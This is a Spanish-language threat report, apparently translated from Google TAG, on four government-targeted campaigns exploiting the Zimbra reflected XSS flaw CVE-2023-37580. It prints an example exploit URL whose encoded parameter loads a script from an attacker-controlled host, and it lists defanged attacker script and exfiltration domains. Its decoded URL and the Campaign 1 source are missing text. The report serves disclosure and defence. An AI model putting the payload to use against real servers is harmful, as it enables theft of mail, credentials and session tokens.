En junio de 2023, el Grupo de análisis de amenazas (TAG) de Google descubrió un exploit de día 0 dirigido a Zimbra Collaboration, un servidor de correo electrónico que muchas organizaciones utilizan para alojar su correo electrónico. Desde que descubrió el día 0, ahora parcheado como CVE-2023-37580 , TAG ha observado cuatro grupos diferentes que explotan el mismo error para robar datos de correo electrónico, credenciales de usuario y tokens de autenticación. La mayor parte de esta actividad ocurrió después de que la solución inicial se hiciera pública en Github. Para garantizar la protección contra este tipo de exploits, TAG insta a los usuarios y organizaciones a mantener el software completamente actualizado y aplicar actualizaciones de seguridad tan pronto como estén disponibles.

Descubrimiento de día 0, revisión y parche

TAG descubrió por primera vez el día 0, una vulnerabilidad reflejada de secuencias de comandos entre sitios (XSS), en junio cuando fue explotada activamente en ataques dirigidos contra el servidor de correo electrónico de Zimbra. Zimbra envió una revisión a su Github público el 5 de julio de 2023 y publicó un aviso inicial con orientación de remediación el 13 de julio de 2023. Parcharon la vulnerabilidad como CVE-2023-37580 el 25 de julio de 2023.

TAG observó tres grupos de amenazas que explotaban la vulnerabilidad antes del lanzamiento del parche oficial, incluidos grupos que pueden haber aprendido sobre el error después de que la solución se hiciera pública inicialmente en Github. TAG descubrió una cuarta campaña que utilizaba la vulnerabilidad XSS después del lanzamiento del parche oficial. Tres de estas campañas comenzaron después de que la revisión se hiciera pública inicialmente, destacando la importancia de que las organizaciones apliquen las soluciones lo más rápido posible.

La vulnerabilidad CVE-2023-37580

CVE-2023-37580 es una vulnerabilidad reflejada de secuencias de comandos entre sitios (XSS). XSS es una vulnerabilidad de una aplicación web que permite inyectar scripts maliciosos en otro sitio web. En este caso, había una vulnerabilidad en Zimbra que inyectaba el parámetro dentro de la URL directamente en la página web, provocando que se ejecutara el script. Un ejemplo que podría desencadenar el XSS es:

 https://mail.REDACTED[.]com/m/momovetost=acg%22%2F%3E%3Cscript%20src%3D%22https%3A%2F%2Fobsorth%2Eopwtjnpoc%2Eml%2FpQyMSCXWyBWJpIos%2Ejs%22%3E% 3C%2Fscript%3E%2F%2F

que decodifica a:

https://mail.REDACTED[.]com/m/momoveto?st=acg"/>//

La solución fue escapar del contenido del parámetro st antes de que se estableciera como valor en un objeto html.

Campaña 1: La primera explotación conocida conduce a un marco de robo de correo electrónico

El descubrimiento inicial de la vulnerabilidad del día 0 fue una campaña dirigida a una organización gubernamental en Grecia. Los atacantes enviaron correos electrónicos que contenían URL de explotación a sus objetivos. Si un objetivo hacía clic en el enlace durante una sesión de Zimbra iniciada, la URL cargaba el mismo marco que Volexity documentó en febrero de 2022. Este marco utiliza XSS para robar datos de correo de los usuarios, como correos electrónicos y archivos adjuntos, y para configurar una configuración automática. -regla de reenvío a una dirección de correo electrónico controlada por el atacante. El marco se cargó desde:

Campaña 2: explotación de Winter Vivern después de la revisión enviada a Github

El parche para la vulnerabilidad se envió a Github el 5 de julio. Otro actor aprovechó la vulnerabilidad durante dos semanas completas a partir del 11 de julio antes de que el parche oficial estuviera disponible el 25 de julio. TAG identificó múltiples URL de exploits dirigidos a organizaciones gubernamentales en Moldavia y Túnez. ; cada URL contenía una dirección de correo electrónico oficial única para organizaciones específicas de esos gobiernos. TAG atribuye esta actividad a Winter Vivern (UNC4907), un grupo APT conocido por explotar XSS en Zimbra y Roundcube . La vulnerabilidad se utilizó para cargar scripts en:

https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js

https://applicationdevsoc[.]com/tndgt/auth.js

Campaña 3: Exploit utilizado para phishing de credenciales

Días antes de que Zimbra lanzara su parche oficial el 25 de julio, TAG observó que un tercer grupo no identificado explotaba la vulnerabilidad como parte de una campaña que buscaba credenciales pertenecientes a una organización gubernamental en Vietnam. En este caso, la URL del exploit apuntaba a un script que mostraba una página de phishing para las credenciales de correo web de los usuarios y publicaba credenciales robadas en una URL alojada en un dominio oficial del gobierno que los atacantes probablemente comprometieron.

Campaña 4: exploit de día N utilizado para robar token de autenticación

En agosto de 2023, después de que se lanzara el parche para CVE-2023-37580, TAG descubrió una cuarta campaña que utilizaba la vulnerabilidad contra una organización gubernamental en Pakistán. El exploit se utilizó para robar el token de autenticación de Zimbra. El token fue extraído a ntcpk[.]org.

Conclusión

El descubrimiento de al menos cuatro campañas que explotan CVE-2023-37580, tres campañas después de que el error se hiciera público por primera vez, demuestra la importancia de que las organizaciones apliquen correcciones a sus servidores de correo lo antes posible. Estas campañas también destacan cómo los atacantes monitorean los repositorios de código abierto para explotar de manera oportunista las vulnerabilidades donde la solución está en el repositorio, pero aún no se ha entregado a los usuarios. Los actores detrás de la Campaña #2 comenzaron a explotar el error después de que la solución fue enviada a Github, pero antes de que Zimbra publicara públicamente el aviso con consejos de solución.

La explotación de CVE-2023-37580 viene inmediatamente después de CVE-2022-24682, otra vulnerabilidad XSS reflejada en los servidores de correo de Zimbra que fue explotada activamente en estado salvaje en 2022 y es seguida por la explotación de CVE-2023-5631. , una vulnerabilidad XSS en los servidores de correo de Roundcube el mes pasado. La explotación habitual de las vulnerabilidades XSS en los servidores de correo también muestra la necesidad de realizar una mayor auditoría del código de estas aplicaciones, especialmente para las vulnerabilidades XSS.